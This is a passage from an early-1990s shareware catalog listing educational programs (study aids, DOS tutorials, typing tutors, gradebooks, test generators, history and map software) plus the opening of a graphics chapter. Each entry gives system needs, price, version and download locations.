FDPLOT.EXE in SCIENCE + forum LIB 8 on CompuServe. + Download size: 74k + Description: + A handy/fuss-free scientific function and data plotting + software intended for upper high-school or college students and + instructors. It is menu driven, fast and easier to use than + most graphics calculators. A linear regression statistics + program is included. + + Product: Fictionary + The game of fantastic/farfetched definitions. See full + description on page 415. + + Product: I.Q. Challenge + Test knowledge in 5 categories, earn diploma. See full + description on page 409. + + Product: KWIKSTAT + Statistical Data Analysis. See full description on page 281. + + Product: PathProj + Path Projection for Ridge Regression. See full description on + page 282. + + Product: PC-ECAP + AC Circuit Analysis program with graphics. See full + description on page 276. + + Product: RXridge + Ridge Regression Computations & Graphics. See full description + on page 283. + + Product: RXtraces + Interactive Ridge Regression TRACE Displays. See full + description on page 283. + + Product: Save the Planet + Ozone & greenhouse data, easy word processor. See full + description on page 325. + + Chapter 13, "Education" 314 + + + + Product: TEACHER + Needs: IBM PC, DOS 3.3 or better. + Author: Tinker Software + Registration: $15.00 + Registration benefits: Unlimited fax/BBS support. + Version: 2.0A (11-23-91) + User benefits: Unlimited fax/BBS support. + Look for: TEACH20A.ZIP on BBSs (call 206-852-7708 to download it + at no charge); TCH20A.ZIP in IBMAPP forum LIB 11 on CompuServe. + Download size: 152k + Description: + Designed to aid the student in studying for tests. It is + designed to be fully configurable with the ability to add or + delete test problems. I consider it useful to most students as + various subjects are covered for study, also with the ability + to change the problems it can be tailored to meet any age + requirement and can GROW with the students abilities. + + Product: YRWAY + Needs: IBM PC, DOS 3.0 or better. + Author: Tinker Software + Registration: $15.00 + Registration benefits: Unlimited fax/BBS support. + Version: 1.0 (01-24-92) + User benefits: Unlimited fax/BBS support. + Look for: YRWAY1.ZIP on BBSs (call 206-852-7708 to download it at + no charge); YRWAY1.ZIP in IBMAPP forum LIB 11 on CompuServe. + Download size: 89k + Description: + Designed to aid the student in studying. It is designed to be + easily configurable with the ability to add or delete their own + SUBJECTS and ANSWERS. With the ability to change the Subjects + it can be tailored to meet any age needs and then can GROW with + the student. It can also be used as a "TRIVIA" type game, by + adding your questions. + + Product: YRWAYx.ZIP + Needs: IBM PC, DOS 3.3 or better. Mouse, EGA monitor optional. + Author: Tinker Software + Registration: $15.00 + Registration benefits: Unlimited support. Lifetime registration. + Version: 2.2 (03-10-92) + User benefits: Unlimited support. Lifetime registration. + Look for: YRWAY22.ZIP on BBSs (call 206-852-7708 to download it + at no charge); YRWY22.ZIP in IBMAPP forum LIB 11 on CompuServe. + Download size: 135k + Description: + Self help study program with the ability to work in many + foreign languages. You supply the Subjects/Answers and Prompts. + Fun and entertaining, it can be easily changed to match the + users knowledge level. + + Chapter 13, "Education" 315 + + + + 13.6 Literature + + Product: Babble! + Creativity tool for writers. See full description on page 142. + + Product: Creativity Package + Become more creative. See full description on page 142. + + Product: ENIGMACROSS [***] + Solve and construct professional acrostics. See full + description on page 414. + + Product: JEPRS (Jeepers!) + Bibliographic Database Management System. See full description + on page 172. + + Product: PoeTrio [***] + Needs: IBM PC, DOS 2.1 or better. + Author: Chatfield Software, Inc., 216-569-3201 + Registration: $20.00 + Registration benefits: Unlimited support, free bonus disk, + product discounts. + Version: 1.0 (06-01-91) + User benefits: Unlimited support, free bonus disk, product + discounts. + Look for: CSPT.ZIP on BBSs; CSPT.ZIP in IBM APPLIC forum LIB 11 + on CompuServe. + Download size: 130k + Description: + Coaches you through the processes for writing three kinds of + verse: free verse, "cantonas," and haiku. Highly interactive, + it contains three separate programs, each with its own editor. + Educational and entertaining. For all ages. + + Product: Poetry Generator + Turn your computer into a poet! See full description on + page 143. + + Product: Poetry Star [***] + AI poetry writing for entertainment, educ. See full + description on page 423. + + + 13.7 Foreign language + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 413. + + Product: LQMATRIX [***] + Softfonts and softfont editor for Epson LQ. See full + description on page 50. + + Chapter 13, "Education" 316 + + + + Product: REXL-Lazarillo de Tormes + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: REXL, 619-481-0781 + Registration: $24.00 + Registration benefits: Printed manual and description of book, + telephone support, upgrade and new product notification. + Version: 1.1 (12-03-91) + User benefits: Printed manual and description of book, telephone + support, upgrade and new product notification. + Look for: availability unknown on BBSs; REXL.ZIP in FLEFO forum + LIB 0 (multiple files) on CompuServe. + Download size: 800k + Description: + This version of the original Spanish edition of "Lazarillo de + Tormes", a classic Spanish novel, displays text and the pop-up + English translations of words and idiomatic expressions that + exactly match the meaning of the text. Improve your Spanish + reading skills and enjoy reading this book without the hassle + of using a dictionary to look up words and idiomatic + expressions that you do not know. + + + 13.8 Computers + + See also: Business, Training aids (page 234). + + Product: Computer Trivia Quiz + Needs: IBM PC, DOS 2.1 or better. 320k RAM. + Author: Shoestring Software + Registration: $20.00 + Registration benefits: Printed Manual, Latest Version on Disk, T- + Shirt, 180 days mail support. + Version: 1.0 (09-07-91) + User benefits: Printed Manual, Latest Version on Disk, T-Shirt, + 180 days mail support. + Look for: QUIZ.ZIP on BBSs; QUIZ.ZIP in IBMNEW forum LIB 8 on + CompuServe; QUIZ.ZIP in IBMPC RTC LIB 7 on GEnie. + Download size: 200k + Special instructions: Product distribution restricted to the + United States. + Description: + An entertaining and enlightening way to increase and/or test + your computer literacy. Subjects range from stone-age + computing, famous founders, milestones, events, machines and + terms to the latest innovations. Can be played by one to six + players. Questions are presented in multiple choice format. For + those that are stumped, don't know the correct answer or just + want to know more about the subject, there is an extremely + informative hint. Try this! + + Chapter 13, "Education" 317 + + + + Product: PC-GLOSSARY [***] + Needs: IBM PC, DOS 2.1 or better. Hard disk or high density + drive. + Author: Disston Ridge, Inc., 813-323-0961 + Registration: $29.00 + Registration benefits: Master disks, phone/CompuServe support, + update discounts. + Version: 4.2 (04-01-92) + User benefits: Master disks, phone/CompuServe support, update + discounts. + Look for: GLOSRY.ZIP on BBSs; GLOSRY.ZIP in IBMAPP forum LIB 11 + on CompuServe; GLOSRY.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 340k + Description: + This educational desktop reference program helps you keep + abreast of the ever-changing terminology in the world of + microcomputers. Hundreds of terms, acronyms, buzzwords, and + abbreviations are defined with many useful reference tables at + your fingertips. Not just one or two line definitions; each + entry has an entire screen full of related information and is + intelligently cross-referenced to other entries. + + Product: The World's Simplest Computer + Needs: IBM PC, DOS 2.0 or better. EGA monitor; any .GIF file + viewer. + Author: Langin Software, 618-532-4899 + Registration: $19.00 + Registration benefits: CompuServe/mail support. + Version: 1.00 (03-28-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; SIMPLE.ZIP in IBMAPP + forum LIB 11 on CompuServe. + Download size: 546k + Description: + Not a program. This is a 66-page "book" of GIF files which + illustrates the basic operations of personal computers. It is + for (1) beginning computer users; (2) intermediate computer + users who "just don't understand" what goes on inside a + computer; (3) expert users who need to train the first two + groups; and, (4) computer retailers who can use it as a slide + show. + + Chapter 13, "Education" 318 + + + + 13.8.1 Operating system tutors + + Product: DOS Summary + Needs: IBM PC, DOS 2.0 or better. + Author: Computer Knowledge + Registration: $0.00 + Registration benefits: Support. + Version: 1.01 (02-23-91) + User benefits: Support. + Look for: DOSSUM.ZIP on BBSs; DSUM01.ZIP in IBMSYS forum LIB 1 on + CompuServe. + Download size: 120k + Description: + A DOS command summary program. When started from DOS you have + the option of accessing either an alphabetical menu of DOS + commands or a menu where commands are grouped by function. A + second way of accessing a command is by starting the program + with a command name as a parameter. Finds the closest match to + the command you entered -- so exact spelling is not necessary. + Only DOS commands are in this version; batch commands and + CONFIG.SYS commands are not. DOS versions to 4.01 supported. + + Product: DOS Summary (Hypertext) + Needs: IBM PC, DOS 2.0 or better. + Author: Computer Knowledge + Registration: $25.00 + Registration benefits: Printed manual with command examples not + found in the software, master disks, bonus utilities. + Shareware disks of other products. + Version: 2.0 (02-15-92) + User benefits: Printed manual with command examples not found in + the software, master disks, bonus utilities. Shareware disks + of other products. + Look for: DOSSUM20.ZIP on BBSs; DSUM02.ZIP in IBMSYS forum LIB 1 + on CompuServe. + Download size: 150k + Description: + DOS Summary is a hypertext tutorial and reference product which + covers all DOS commands and drivers through MS-DOS 5.0. Also + added are tutorials covering memory management and how DOS + starts. The program can be used in standalone or resident mode. + When started, you have the option of an alphabetical command + menu or a menu where commands are grouped by function. You may + also start the program with a DOS command name as a parameter + and be taken immediately to that command. + + Chapter 13, "Education" 319 + + + + Product: DosEA 1--For Absolute Beginners + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Registration benefits: CompuServe/mail support. + Version: 2.00 (05-19-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA1.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 112k + Description: + A series of hypertext tutorials on MS-DOS. Demonstrates the + hypertext system used in the remainder of the series. Supports + a mouse. + + Product: DosEA 2--What is DOS? + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Registration benefits: CompuServe/mail support. + Version: 2.00 (05-19-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA2.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 142k + Description: + Second in the DosEA series. A background on how computers and + MS-DOS were developed is given. "Operating system" is + described. The DOS prompt and the DOS commands are introduced. + Hands-on practice is provided in recognizing the DOS prompt and + changing default disk drives. A "hyperbook": Has chapters like + a book, but is written in hypertext. Start the series here or + with any DosEA program: Each one stands alone. + + Product: DosEA 3--10 Easy Commands + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Registration benefits: CompuServe/mail support. + Version: 2.00 (05-19-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA3.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 154k + Description: + Third in the DosEA series of hypertext tutorials on MS-DOS. + DosEA 3 describes and provides hands-on practice for 10 easy + DOS commands: CLS, DATE, DIR, EXIT, PROMPT, TIME, TYPE, VER, + VERIFY, and VOL. The program screens for errors: If the user + enters a command wrong, it is not accepted. If three errors + are made, the program demonstrates how to enter the command. A + properly entered command is executed by the user's DOS. + + Chapter 13, "Education" 320 + + + + Product: DosEA 4--Find That Command! + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Registration benefits: CompuServe/mail support. + Version: 2.00 (05-19-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA4.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 116k + Description: + Fourth in the DosEA series of hypertext tutorials. This + utility helps the user find the right DOS commands to perform + certain tasks. Memory jolting words are used to direct users + to the appropriate commands. + + Product: DosEA 5--All About MS-DOS 5.0 + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Registration benefits: CompuServe/mail support. + Version: 1.00 (07-05-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA5.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 128k + Description: + Fifth in the DosEA series of hypertext tutorials on DOS. This + is a reference of the additions, deletions, and changes in MS- + DOS 5. It makes feature-by-feature, command-by-command, + switch-by-switch comparisons between MS-DOS 5 and previous + representative versions of DOS. It is not only for beginners, + but also experienced computer users; those that have MS-DOS 5 + and those that do not. In short, anyone who is interested in + the changes in MS-DOS 5. + + Product: DosEA 6--Switched on DOS + Needs: IBM PC, DOS 2.0 or better. + Author: Langin Software, 618-532-4899 + Registration: $10.00 + Registration benefits: CompuServe/mail support. + Version: 1.00 (09-14-91) + User benefits: CompuServe/mail support. + Look for: availability unknown on BBSs; DEA6.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 138k + Description: + A hypertext database of the 238 DOS command switches and + parameters from versions 1.0 to 5.0. (MS-DOS 5.0 added 85 + switches and other parameters!) Access them by command, DOS + version, switch, parameter, or name. Nothing else like it. A + "must have" for "power users." + + Chapter 13, "Education" 321 + + + + Product: Stringer/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Registration benefits: Eligibility for free upgrades. + Version: 1.02 (06-06-90) + User benefits: Eligibility for free upgrades. + Look for: STRIO102.ZIP on BBSs; STRIO1.ZIP in IBMNEW forum LIB 5 + on CompuServe. + Download size: 15k + Description: + Draws string art in a Presentation Manager window. Use as a + demonstration, or to help train new users on OS/2. Also + helpful for showing machine capabilities or taking advantage of + idle CPU time. Options to change color & speed. Hypnotic & + addicting! + + Product: TUTOR.COM + Needs: IBM PC, DOS 2.0 or better. + Author: Computer Knowledge + Registration: $15.00 + Registration benefits: Printed manual, master disks. + Version: 4.5 (05-01-91) + User benefits: Printed manual, master disks. + Look for: TUTCOM.ZIP on BBSs; TUTCOM.ZIP in IBMAPP forum LIB 11 + on CompuServe. + Download size: 300k + Description: + A minicourse in microcomputing covering the basics of a variety + of topics including: Computer History, Introduction to DOS, + Computer Terminology, Subdirectories, Hardware, Batch Files, + the Keyboard, and Introduction to Programming. Material is + presented in a series of screens and the user has the ability + to move forward or backward through the tutorials, or jump to + selected locations using a menu. Short quizzes test you on your + knowledge but you may bypass these when reviewing. + + 13.8.2 Typing tutors + + Product: PC-FasType/CGA + Needs: IBM PC, DOS 3.0 or better. CGA monitor. + Author: Trendtech Corporation, 201-694-8622 + Registration: $25.00 + Registration benefits: Disk with latest version; Printed 80-page + User's Guide, Money-back-guarantee. + Version: 4.3 (08-01-91) + User benefits: Disk with latest version; Printed 80-page User's + Guide, Money-back-guarantee. + Look for: FSTYPC43.ZIP (multiple files) on BBSs. + Download size: 250k + Description: + A professional menu-driven MS-DOS typing tutorial for PC's + equipped with any of 3 popular keyboard styles. Program + displays image of keyboard and prompts for letters and words to + + Chapter 13, "Education" 322 + + + + type. New version has many added features. Options to type your + own text files, or choose your own letters for drills. + Features: save settings, save statistics, print history; Open + Typing lets you practice WP skills; type Long Paragraphs + without keyboard display; Timed Exercises, KAPS for Kids; + Hidden keys, sound, more... + + Product: PC-FasType/MONO + Needs: IBM PC, DOS 3.0 or better. + Author: Trendtech Corporation, 201-694-8622 + Registration: $25.00 + Registration benefits: Disk with latest version; 80-page printed + User's Guide; money-back guarantee. + Version: 1.3 (08-01-91) + User benefits: Disk with latest version; 80-page printed User's + Guide; money-back guarantee. + Look for: FSTYPM13.ZIP (multiple files) on BBSs. + Download size: 250k + Description: + This MONOCHROME version of PC-FasType/CGA will run on any PC. + Uses character graphics to display keyboards. Functionality + identical to the CGA version. Ideal for portables, laptops, and + notebook PC's. See PC-FasType/CGA description for more + details. + + Product: TOUCH TYPE TUTOR + Needs: IBM PC, DOS 3.0 or better. + Author: Gray Design Associates + Registration: $10.00 + Registration benefits: Latest registered version. + Version: 3.4 (05-14-91) + User benefits: Latest registered version. + Look for: availability unknown on BBSs; TTTUTO.EXE in IBMAPP + forum LIB 11 on CompuServe. + Download size: 120k + Description: + Super easy-to-use touch typing tutor for any monitor, color or + monochrome. Has 3 modes of operation: Tutorial, Speed Test and + Game. Tutorial mode presents a series of lessons which reacts + to your typing skill & feeds you with sentences designed to + improve your slowest and most error-prone keys! Speed Test is + suitable for rating professional typists' speeds. Game mode is + highly addictive! + + Chapter 13, "Education" 323 + + + + 13.9 Teachers + + Product: BESTTEST + Needs: IBM PC, DOS 2.1 or better. + Author: WiseWare + Registration: $50.00 + Registration benefits: Bound version of users manual, disk with + latest program release. + Version: 1.5 (06-01-91) + User benefits: Bound version of users manual, disk with latest + program release. + Look for: availability unknown on BBSs; BSTTST.EXE in EDFORUM + forum LIB 2 on CompuServe. + Download size: 218k + Description: + Makes test preparation easy. Supports all standard item + formats: essay, fill-in, true/false, multiple choice, and + matching. Full word wrap. Items up to 25, 43 or 50 lines in + length (depending on your monitor). Up to 1000 test items in a + single file. Easy export of items from one file to another. + The program supports bold, underline, subscript and + superscript. You may use any character in the extended ASCII + set. Choose test items manually or use the auto-select + function. On-line help. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 135. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 413. + + Product: FASTFILE + Laptop database for business, school, home. See full + description on page 155. + + Product: LessonPlanZ + Needs: IBM PC, DOS 2.1 or better. IBM Graphics or LaserJet + printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Version: 2.10 (01-07-92) + User benefits: Master disks, phone/BBS/mail support. + Look for: LPLANZ21.ZIP on BBSs (call 317-784-2147 to download it + at no charge); LPLANZ.ZIP in EDFORUM forum LIB 0 on CompuServe. + Download size: 180k + Description: + Lesson planning made easy! The program has separate areas for + Goals, Objectives, Methods, Evaluations, and Materials. Each + area can be from 1 to 5000 lines long! Header infromation + holds title, dates covered, number of days, subject and more. + Default settings for School and Teacher Name. Prints a variety + + Chapter 13, "Education" 324 + + + + of reports including a basic lesson plan, separate areas, a + custom listing, and folder labels to hold your plans! Uses + common WP commands, menu driven, mousable, and on line help. + + Product: PC-CAI + Write Computer Driven Tutorial on any Subject. See full + description on page 328. + + Product: Q&A Study Aid + Needs: IBM PC, DOS 2.1 or better. External flat-file editor, + 256k RAM. + Author: Quid Pro Quo Software + Registration: $20.00 + Registration benefits: Notification of upgrades; upgrades + available for $5.00 S&H, elimination of 'Unregistered' notices. + Version: 3.90 (09-01-91) + User benefits: Notification of upgrades; upgrades available for + $5.00 S&H, elimination of 'Unregistered' notices. + Look for: Q&ASA*.ZIP on BBSs (call 517-695-9952 to download it at + no charge); QASA*.ZIP in IBMAPP forum LIB 11 on CompuServe. + Download size: 113k + Description: + A computer-based test creation and execution system. Test + databases of up to 40000 questions are created with external + editor using simple syntax. Program contains compiler and test + interpreter, presents the compiled test, scores all answers and + optionally records results in a score file. All data is + encrypted or password-protected. Score files may be exported. + Supports all question types except essay. Has weighting, letter + grade associations, correct answer display, more. + + 13.9.1 Gradebooks + + Product: GradeBook for Windows [***] + Needs: IBM PC, Windows 3.0 or better. Hard disk. VBRUN100.DLL- + Visual Basic DLL. + Author: Russell Stevens + Registration: $29.00 + Registration benefits: Printed manual, support. + Version: 1.05 (04-07-92) + User benefits: Printed manual, support. + Look for: availability unknown on BBSs; GB.EXE in EDFORUM forum + LIB 2 on CompuServe. + Download size: 233k + Description: + Advanced GradeBook for the professional educator. Extensive on- + line help. No practical limit on terms, classes, students or + tasks. User categories, optional ID#'s, total points or + weighted scores, discard worst score(s), extra credit, multiple + class score and grade distributions with charts, progress + reports, import, export and clipboard support, font support, + interim weights, required final scores, much more. + + Chapter 13, "Education" 325 + + + + Product: VAR Grade + Needs: IBM PC, DOS 2.0 or better. 384K RAM. Hercules or CGA + monitor. + Author: VARed Software, 805-523-7546 + Registration: $50.00 + Registration benefits: Current version with printed manual, as + well as the next major version (and manual). + Version: 4.66 (12-11-91) + User benefits: Current version with printed manual, as well as + the next major version (and manual). + Look for: GRADE*.ZIP (multiple files) on BBSs; GRADE*.ZIP in + ZNT:PBS forum LIB 0 (multiple files) on CompuServe. + Download size: 600k + Description: + A full-featured program for recording, plotting, and analyzing + scores on assignments and attendance. You can have any number + of students, assignments, sections, or classes. Can handle + numbers, letters, and extra credit. It can automatically sum, + average, discard, and weight scores. A variety of statistical + tests and plots can be done on your grades. You can sort + students, import/export grades, and define your own grading + system. The program is extremely flexible. + + + 13.10 Science + + Product: Ecomaster + Ecology simulation for 1 or more players. See full description + on page 419. + + Product: PC-TRACK + Satellite Tracking Package. See full description on page 348. + + Product: Save the Planet + Needs: IBM PC, DOS 2.0 or better. 512k RAM, CGA or Hercules + monitor. + Author: Save the Planet Software, 303-641-5035 + Registration: $24.95 + Registration benefits: Quick reference guide, master disks, + support, bonus utilities, upgrade discounts. + Version: 2.50 (01-31-92) + User benefits: Quick reference guide, master disks, support, + bonus utilities, upgrade discounts. + Look for: STP250.ZIP on BBSs (call 919-434-8664 to download it at + no charge); SAVEP.EXE in OUTDOORS forum LIB 16 on CompuServe. + Download size: 335k + Description: + Learn about ozone depletion and global warming with an + interesting presentation using graphics, text, and maps. Up-to- + date global data - population explosion, deforestation, + atmospheric chemistry - on issues affecting you, your kids, the + planet. Take action, using STP's resources: + + Chapter 13, "Education" 326 + + + + Built-in word processor, using Congressional database, for + quick letters to Washington. Greenhouse simulator, + environmental groups, voting scores, new legislation, + recycling, shopping, investing, energy saving ideas. + + Product: WinGraph [***] + Cartesian (2D & 3D) & Polar Equation Grapher. See full + description on page 280. + + + 13.11 History + + Product: CHRONOS + Interactive historical timelines. See full description on + page 326. + + Product: Flags [***] + Displays 600 Flags from around the World. See full description + on page 308. + + Product: On This Day [***] + Needs: IBM PC, DOS 2.1 or better. + Author: The Software Construction Co. + Registration: $25.00 + Registration benefits: Master disks. + Version: 1.1 (11-26-91) + User benefits: Master disks. + Look for: OTD_11.ZIP on BBSs (call 508-454-3864 to download it at + no charge); OTD.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 122k + Description: + This event DB and printing program accepts the date you are + interested and it prints the events that happened on that day + in history: + * Astronomical Events (Moon Phases, Solstices, etc) + * Birthdays of famous people + * Religious Holidays (Jewish, Christian, etc) + * Much more + + Uses text file databases, meaning you can edit them with your + favorite text editor (though they can be read in compressed + form). A personal events file is also supported. + + Chapter 13, "Education" 327 + + + + 13.12 Software tools + + 13.12.1 For other + + Product: CHRONOS + Needs: IBM PC, DOS 2.1 or better. + Author: Cascoly Software, 206-523-6135 + Registration: $30.00 + Registration benefits: Phone/CompuServe support. + Version: 2.05 (03-30-92) + User benefits: Phone/CompuServe support. + Look for: availability unknown on BBSs; CHRNOS.ZIP in IBMAPP + forum LIB 11 on CompuServe. + Download size: 132k + Description: + How old was Paul Revere when he rode into history? How many + years separated Michelangelo and Cortez? This program lets you + sort and select by individual people and events, or groups and + factions, to develop new insights and trace patterns across + different eras and cultures. Useful to history and art + students, teachers, genealogists, lawyers, writers or anyone + interested in exploring historical relations or cultural + events. Prints wall charts. + + Product: CROSSDOWN [***] + Solve and construct professional crosswords. See full + description on page 413. + + Product: HyperPAD + The HyperMedia Platform for MS-DOS. See full description on + page 297. + + Product: MakeDemo + Presentation program with interactive menuing. See full + description on page 184. + + Product: NETCLASS [***] + Needs: IBM PC, DOS 3.0 or better. Novell LAN. + Author: Pyramid Software, 607-748-6630 + Registration: $89.00 + Registration benefits: Printed manual, master disks, support, + upgrade discounts. + Version: 1.00 (03-05-92) + User benefits: Printed manual, master disks, support, upgrade + discounts. + Look for: availability unknown on BBSs; NCLASS.ZIP in NOVLIB + forum LIB 15 on CompuServe. + Download size: 110k + Description: + Provides an electronic classroom environment on a Novell + network by allowing an instructor to transmit live screens, + keystrokes, and mouse pointer, to an ulimited number of + students on the LAN. Students are allowed to take notes on- + line during a live session. Can be used for other purposes + + Chapter 13, "Education" 328 + + + + such as sales presentations, tradeshows, store-front displays, + etc. Features include graphic support, mouse support, NetWare + style menus, easy installation, etc. + + Product: PC-CAI + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: TexaSoft, 214-291-2115 + Registration: $49.00 + Registration benefits: Printed Manual, Bonus Examples, discounted + updates, newsletter. + Version: 2.05 (05-24-91) + User benefits: Printed Manual, Bonus Examples, discounted + updates, newsletter. + Look for: PCCAI2.ZIP on BBSs; PCCAI2.ARC in IBMAPP forum LIB 11 + on CompuServe. + Download size: 250k + Description: + A computer assisted instructional tool. This award-winning + authoring language allows you to write computer driven + tutorial, tests, rolling demos, and similar programs. Use + color, graphics, animation, questions and answers, menuing and + branching. Respond to input from users, record answers, grade + results. This is only CAI type program to win 4 stars (highest + rank) in "Tools For Teachers" in Shareware Magazine. + + Product: PREP + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: Southwind Software + Registration: $35.00 + Registration benefits: User Guide, Support by Mail or Compuserve. + Version: 1.2 (08-23-91) + User benefits: User Guide, Support by Mail or Compuserve. + Look for: availability unknown on BBSs; PREP.ZIP in IBMAPPS forum + LIB 11 on CompuServe. + Download size: 240k + Description: + A Multiple Choice, True/False Test/Drill Program generator. + Question Sets may contain up to 200 questions. Sub-sets may be + created from Master Question Sets. Each question may contain 5 + choices with responses for questions answered correctly and + incorrectly. Extensive review opportunities of individual and + group results (up to 300 individuals). Also, generates ASCII + files for manual testing and answer entry. Context Sensitive + Help throughout. + + Product: Technical Editor + DOS/OS2 Programmers/Text editor (VIRTUAL). See full + description on page 131. + + Chapter 13, "Education" 329 + + + + 13.13 Other + + Product: 3 ball Juggler + Juggling tutor and arcade-game like simulator. See full + description on page 405. + + Product: Dad's Choice + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Motes Educational Software, 501-442-5652 + Registration: $15.00 + Registration benefits: Mail support. Shareware disks of other + programs. + Version: 2.0 (09-09-91) + User benefits: Mail support. Shareware disks of other programs. + Look for: availability unknown on BBSs; DAD20.ZIP in IBMAPP forum + LIB 11 on CompuServe. + Download size: 93k + Description: + This program was designed for children who are interested in + Math and Engineering. It has arcade games for math and + multilevel instruction for addition, subtraction, + multiplication, division, and basic algebra. It also has a + graphics option that allows you to draw lines, boxes, circles, + arcs, text, and macros. These can be painted, edited, stored, + animated, and printed using your screen dump utility. + + Product: LEANER + Weight Control Charting & Motivation Program. See full + description on page 224. + + Product: LessonPlanZ + Lesson planning made EZ. See full description on page 323. + + Product: Q&A Study Aid + Comprehensive Computer Testing/Grading System. See full + description on page 324. + + Product: School-Mom + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Motes Educational Software, 501-442-5652 + Registration: $25.00 + Registration benefits: Printed manual, mail support, bonus + utilities. + Version: 3.58 (12-31-91) + User benefits: Printed manual, mail support, bonus utilities. + Look for: availability unknown on BBSs; MOM358.ZIP in IBMAPP + forum LIB 11 on CompuServe. + Download size: 122k + Description: + This is a complete education program for kids of all ages + written by Dr. Andrew Motes. With this software you can have + fun while you learn. It has modules for Math, Music + Composition, English, Spelling, Art, Telling Time, and even an + + Chapter 13, "Education" 330 + + + + exam generator. Each module has multiple learning levels so + your child will never outgrow it. + + Product: VERSAMAP + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Author: Charles H. Culberson, 302-731-0694 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support, bonus maps. + Version: 1.16 (02-21-92) + User benefits: Master disks, phone/CompuServe/mail support, bonus + maps. + Look for: VMAP.ZIP on BBSs; VMAPS.EXE in IBMAPP forum LIB 7 on + CompuServe. + Download size: 334k + Description: + Draws outline maps on 8 map projections using the digital map + databases Micro World Data Bank II and The World Digitized. + Maps can be printed on the screen, on dot-matrix or laser + printers, as bit-mapped .PCX files, as Lotus .PIC files, or as + ASCII files, for use with paint programs, word processors, and + presentation graphics or technical graphing programs. Text may + be added to maps using Courier or Helvetica fonts supplied with + the program. A digital map database is supplied with the + program. + + Product: WORLD29 + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Robert L. Lloyd + Registration: $10.00 + Registration benefits: One free update on user provided disk. + Discounts on additional updates. + Version: 2.9D (12-11-91) + User benefits: One free update on user provided disk. Discounts + on additional updates. + Look for: availability unknown on BBSs; WORLDX.EXE in IBMAPP + forum LIB 7 on CompuServe. + Download size: 360k + Description: + Puts a globe in your computer. It provides rapid maps of any + place on earth. Over 200 National capitals are located the user + can add locations and overlay maps to meet his own needs. + Additionally, it provides a global tracking system which allows + the user to track anything that can be given a latitude and + longitude, anywhere in the world. + + Provides sample Hurricane tracks, sample map overlays, and + sample Custom Location files. Search by Name or Point and + shoot. + + Chapter 14, "Graphics" 331 + + + + + + Chapter 14 + Graphics + + See also: Communications, Modem-based graphics applications + (page 184). + + + 14.1 Viewing programs + + Product: Listico + Needs: IBM PC, DOS 3.0 or better. EGA monitor. + Author: Gateway Software + Registration: $15.00 + Registration benefits: Registration Code is mailed out. + Version: 2.00 (05-01-91) + User benefits: Registration Code is mailed out. + Look for: LICO20.ZIP on BBSs; LICO20.ZIP in WIN forum LIB 0 on + CompuServe; LICO20.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 120k + Description: + Contains two icon viewing programs, one for DOS and one for + Windows. Displays alphabetically up to 4000 icon files. With + the DOS version, you can easily find an icon in a large library + and launch an icon editor. + + Product: Movie Guide + Catalog Movies with full multimedia support. See full + description on page 361. + + Product: Paint Shop Pro [***] + Image displayer, converter, editor. Scrn Cap. See full + description on page 340. + + Product: PixFolio Image Catalog System + Windows Image Cataloging System. See full description on + page 11. + + Product: PlotManager + Plot Management Utility. See full description on page 338. + + Chapter 14, "Graphics" 332 + + + + Product: Show Partner Lite + Needs: IBM PC, DOS 2.1 or better. 384k RAM, CGA or Hercules + monitor. + Author: Brightbill-Roberts and Company, Ltd., 800-444-3490 + Registration: $79.00 + Registration benefits: Latest version, printed/bound manuals, + free 800# tech support, special offers and discounts. + Version: 3.7 (09-01-91) + User benefits: Latest version, printed/bound manuals, free 800# + tech support, special offers and discounts. + Look for: SPLIT*.ZIP (multiple files) on BBSs (call 315-472-1058 + to download it at no charge); SPLIT*.ZIP in PCVENC forum LIB 1 + (multiple files) on CompuServe; SPLIT*.ZIP in IBMPC RTC LIB 3 + (multiple files) on GEnie. + Download size: 640k + Description: + The venerable software classic that introduced the development + of lively, animated screen shows to the general computing + public. First released in 1985 and subsequently bundled with + the Microsoft Mouse for several years, this program has over + 750,000 users. This version updates the program with several + new screen effects, enhanced graphical menu capability, and + smoother animation/color palette manipulation. Included is a + royalty-free runtime module. + + Product: SlideManager + AutoCAD Slide Library Manager. See full description on + page 345. + + Product: STAFF-GRAF + Needs: IBM PC, DOS 3.0 or better. 640k RAM. Hard disk. Extended/ + expanded memory recommended. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $39.00 